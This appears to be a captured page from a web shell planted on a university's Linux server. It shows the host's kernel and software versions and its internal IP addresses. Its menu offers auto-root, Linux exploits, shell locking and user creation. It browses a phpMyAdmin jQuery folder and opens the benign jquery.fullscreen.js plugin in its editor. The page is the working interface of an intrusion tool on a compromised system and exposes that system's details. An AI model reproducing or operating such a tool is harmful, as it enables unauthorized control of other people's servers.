Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
js /
jquery /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxr-x
additional-methods.js
38.36
KB
-rwxrwxr-x
jquery.ba-hashchange-1.3.js
16.13
KB
-rwxrwxr-x
jquery.cookie.js
3.63
KB
-rwxrwxr-x
jquery.debounce-1.0.5.js
1.14
KB
-rwxrwxr-x
jquery.event.drag-2.2.js
12.53
KB
-rwxrwxr-x
jquery.fullscreen.js
5.52
KB
-rwxrwxr-x
jquery-migrate-3.0.0.js
14.57
KB
-rwxrwxr-x
jquery.min.js
84.68
KB
-rwxrwxr-x
jquery.mousewheel.js
8.07
KB
-rwxrwxr-x
jquery.sortableTable.js
8.07
KB
-rwxrwxr-x
jquery.svg.js
55.32
KB
-rwxrwxr-x
jquery.tablesorter.js
39.16
KB
-rwxrwxr-x
jquery-ui.min.js
247.74
KB
-rwxrwxr-x
jquery.uitablefilter.js
3.4
KB
-rwxrwxr-x
jquery-ui-timepicker-addon.js
76.64
KB
-rwxrwxr-x
jquery.validate.js
46.41
KB
-rwxrwxr-x
MIT-LICENSE.txt
1.07
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.fullscreen.js
/** * @preserve jquery.fullscreen 1.1.5 * https://github.com/kayahr/jquery-fullscreen-plugin * Copyright (C) 2012-2013 Klaus Reimer <k@ailis.de> * Licensed under the MIT license * (See http://www.opensource.org/licenses/mit-license) */ (function(jQuery) { /** * Sets or gets the fullscreen state. * * @param {boolean=} state * True to enable fullscreen mode, false to disable it. If not * specified then the current fullscreen state is returned. * @return {boolean|Element|jQuery|null} * When querying the fullscreen state then the current fullscreen * element (or true if browser doesn't support it) is returned * when browser is currently in full screen mode. False is returned * if browser is not in full screen mode. Null is returned if * browser doesn't support fullscreen mode at all. When setting * the fullscreen state then the current jQuery selection is * returned for chaining. * @this {jQuery} */ function fullScreen(state) { var e, func, doc; // Do nothing when nothing was selected if (!this.length) return this; // We only use the first selected element because it doesn't make sense // to fullscreen multiple elements. e = (/** @type {Element} */ this[0]); // Find the real element and the document (Depends on whether the // document itself or a HTML element was selected) if (e.ownerDocument) { doc = e.ownerDocument; } else { doc = e; e = doc.documentElement; } // When no state was specified then return the current state. if (state == null) { // When fullscreen mode is not supported then return null if (!((/** @type {?Function} */ doc["exitFullscreen"]) || (/** @type {?Function} */ doc["webkitExitFullscreen"]) || (/** @type {?Function} */ doc["webkitCancelFullScreen"]) || (/** @type {?Function} */ doc["msExitFullscreen"]) || (/** @type {?Function} */ doc["mozCancelFullScreen"]))) { return null; } // Check fullscreen state state = !!doc["fullscreenElement"] || !!doc["msFullscreenElement"] || !!doc["webkitIsFullScreen"] || !!doc["mozFullScreen"]; if (!state) return state; // Return current fullscreen element or "true" if browser doesn't // support this return (/** @type {?Element} */ doc["fullscreenElement"]) || (/** @type {?Element} */ doc["webkitFullscreenElement"]) || (/** @type {?Element} */ doc["webkitCurrentFullScreenElement"]) || (/** @type {?Element} */ doc["msFullscreenElement"]) || (/** @type {?Element} */ doc["mozFullScreenElement"]) || state; } // When state was specified then enter or exit fullscreen mode. if (state) { // Enter fullscreen func = (/** @type {?Function} */ e["requestFullscreen"]) || (/** @type {?Function} */ e["webkitRequestFullscreen"]) || (/** @type {?Function} */ e["webkitRequestFullScreen"]) || (/** @type {?Function} */ e["msRequestFullscreen"]) || (/** @type {?Function} */ e["mozRequestFullScreen"]); if (func) { func.call(e); } return this; } else { // Exit fullscreen func = (/** @type {?Function} */ doc["exitFullscreen"]) || (/** @type {?Function} */ doc["webkitExitFullscreen"]) || (/** @type {?Function} */ doc["webkitCancelFullScreen"]) || (/** @type {?Function} */ doc["msExitFullscreen"]) || (/** @type {?Function} */ doc["mozCancelFullScreen"]); if (func) func.call(doc); return this; } } /** * Toggles the fullscreen mode. * * @return {!jQuery} * The jQuery selection for chaining. * @this {jQuery} */ function toggleFullScreen() { return (/** @type {!jQuery} */ fullScreen.call(this, !fullScreen.call(this))); } /** * Handles the browser-specific fullscreenchange event and triggers * a jquery event for it. * * @param {?Event} event * The fullscreenchange event. */ function fullScreenChangeHandler(event) { jQuery(document).trigger(new jQuery.Event("fullscreenchange")); } /** * Handles the browser-specific fullscreenerror event and triggers * a jquery event for it. * * @param {?Event} event * The fullscreenerror event. */ function fullScreenErrorHandler(event) { jQuery(document).trigger(new jQuery.Event("fullscreenerror")); } /** * Installs the fullscreenchange event handler. */ function installFullScreenHandlers() { var e, change, error; // Determine event name e = document; if (e["webkitCancelFullScreen"]) { change = "webkitfullscreenchange"; error = "webkitfullscreenerror"; } else if (e["msExitFullscreen"]) { change = "MSFullscreenChange"; error = "MSFullscreenError"; } else if (e["mozCancelFullScreen"]) { change = "mozfullscreenchange"; error = "mozfullscreenerror"; } else { change = "fullscreenchange"; error = "fullscreenerror"; } // Install the event handlers jQuery(document).bind(change, fullScreenChangeHandler); jQuery(document).bind(error, fullScreenErrorHandler); } jQuery.fn["fullScreen"] = fullScreen; jQuery.fn["toggleFullScreen"] = toggleFullScreen; installFullScreenHandlers(); })(jQuery);
Close